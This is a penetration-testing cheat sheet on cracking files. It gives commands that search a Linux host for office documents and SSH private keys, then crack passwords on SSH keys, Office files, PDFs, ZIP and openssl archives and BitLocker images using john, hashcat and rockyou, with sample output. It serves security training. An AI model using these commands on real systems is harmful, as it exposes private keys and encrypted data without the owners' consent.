Cracking Files

Hunting for encoded files

Hunting for files

cry0l1t3@unixclient:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

Hunting for SSH Keys

cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"

If ssh key has Proc-Type: 4,ENCRYPTED, then we can't use that because it is password protected

Hunting for archives

Download all file extensions

$ curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt

Cracking using john

Cracking SSH keys

$ ssh2john.py SSH.private > ssh.hash
$ john --wordlist=rockyou.txt ssh.hash
$ john ssh.hash --show

SSH.private:1234

1 password hash cracked, 0 left

Cracking Microsoft Office Documents

$ office2john.py Protected.docx > protected-docx.hash
$ john --wordlist=rockyou.txt protected-docx.hash
$ john protected-docx.hash --show

Protected.docx:1234

Cracking PDFs

$ pdf2john.py PDF.pdf > pdf.hash
$ john --wordlist=rockyou.txt pdf.hash
$ john pdf.hash --show

PDF.pdf:1234

1 password hash cracked, 0 left

Cracking ZIP

$ zip2john ZIP.zip > zip.hash
$ john --wordlist=rockyou.txt zip.hash
$ john zip.hash --show

ZIP.zip/customers.csv:1234:customers.csv:ZIP.zip::ZIP.zip

1 password hash cracked, 0 left

Cracking openssl encrypted archives

there will be lots of false positive and might also fail finding the correct password so we must use the openssl itself

$ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null| tar xz;done

Cracking bitlocker encrypted drives

$ bitlocker2john -i Backup.vhd > backup.hashes
$ hashcat -m 22100 backup.hash /opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt -o backup.cracked

hashcat (v6.1.1) starting...

<SNIP>

$bitlocker$0$16$02b329c0453b9273f2fc1b927443b5fe$1048576$12$00b0a67f961dd80103000000$60$d59f37e70696f7eab6b8f95ae93bd53f3f7067d5e33c0394b3d8e2d1fdb885cb86c1b978f6cc12ed26de0889cd2196b0510bbcd2a8c89187ba8ec54f:1234qwer
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: BitLocker
Hash.Target......: $bitlocker$0$16$02b329c0453b9273f2fc1b927443b5fe$10...8ec54f
Time.Started.....: Wed Feb  9 11:46:40 2022 (1 min, 42 secs)
Time.Estimated...: Wed Feb  9 11:48:22 2022 (0 secs)
Guess.Base.......: File (/opt/useful/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       28 H/s (8.79ms) @ Accel:32 Loops:4096 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2880/6163 (46.73%)
Rejected.........: 0/2880 (0.00%)
Restore.Point....: 2816/6163 (45.69%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1044480-1048576
Candidates.#1....: chemical -> secrets

Started: Wed Feb  9 11:46:35 2022
Stopped: Wed Feb  9 11:48:23 2022

Mounting .vhd

https://www.linuxuprising.com/2019/04/how-to-mount-bitlocker-encrypted.html

PreviousUsing Linux NextPivoting, Tunneling, and Port Forwarding

Last updated 2 years ago

hashtagHunting for encoded files

hashtagHunting for files

hashtagHunting for SSH Keys

hashtagHunting for archives

hashtagDownload all file extensions

hashtagCracking using john

hashtagCracking SSH keys

hashtagCracking Microsoft Office Documents

hashtagCracking PDFs

hashtagCracking ZIP

hashtagCracking openssl encrypted archives

hashtagCracking bitlocker encrypted drives

hashtagMounting .vhd

Hunting for encoded files

Hunting for files

Hunting for SSH Keys

Hunting for archives

Download all file extensions

Cracking using john

Cracking SSH keys

Cracking Microsoft Office Documents

Cracking PDFs

Cracking ZIP

Cracking openssl encrypted archives

Cracking bitlocker encrypted drives

Mounting .vhd